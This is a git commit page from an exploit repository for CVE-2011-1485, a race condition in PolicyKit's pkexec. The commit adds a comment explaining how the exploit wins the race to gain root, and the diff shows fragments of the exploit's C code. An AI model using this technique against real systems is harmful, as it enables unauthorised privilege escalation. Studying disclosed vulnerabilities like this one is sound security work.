authorJason A. Donenfeld <Jason@zx2c4.com>2011-09-02 18:50:53 -0400
committerJason A. Donenfeld <Jason@zx2c4.com>2011-09-02 18:50:53 -0400
commit164b5dfcbe58cd5cb813372d89088b71d3d9e7de (patch)
treee40d3f998c5c96a3744737f3c07bcd2fc0837873
parentInitial import. (diff)
downloadCVE-2011-1485-164b5dfcbe58cd5cb813372d89088b71d3d9e7de.tar.xz
CVE-2011-1485-164b5dfcbe58cd5cb813372d89088b71d3d9e7de.zip
Add message.
-rw-r--r--pkexec.c14
1 files changed, 13 insertions, 1 deletions
diff --git a/pkexec.c b/pkexec.c
index b0c1f0e..56b28b9 100644
--- a/pkexec.c
+++ b/pkexec.c
@@ -1,3 +1,16 @@
+/*
+ * Howdy folks. This exploits CVE-2011-1485, a race condition in PolicyKit.
+ * pkexec determines the UID of its parent by checking the UID of /proc/PID.
+ * What they really want to be checking is the EUID but this doesn't do it,
+ * so the following exploit wins the race by execl'ing to a suid process
+ * just as pkexec is about to check the UID of the parent process. Greets
+ * to djrbliss.
+ *
+ * - zx2c4
+ * 2-sept-2011
+ *
+ */
+
#include <stdio.h>
#include <stdlib.h>
@@ -19,7 +32,6 @@ int main(int argc, char **argv)
char pid_path[1024];
sprintf(pid_path, "/proc/%i", getpid());
printf("[+] Configuring inotify for proper pid.\n");
-
close(0); close(1); close(2);
fd = inotify_init();
if (fd < 0)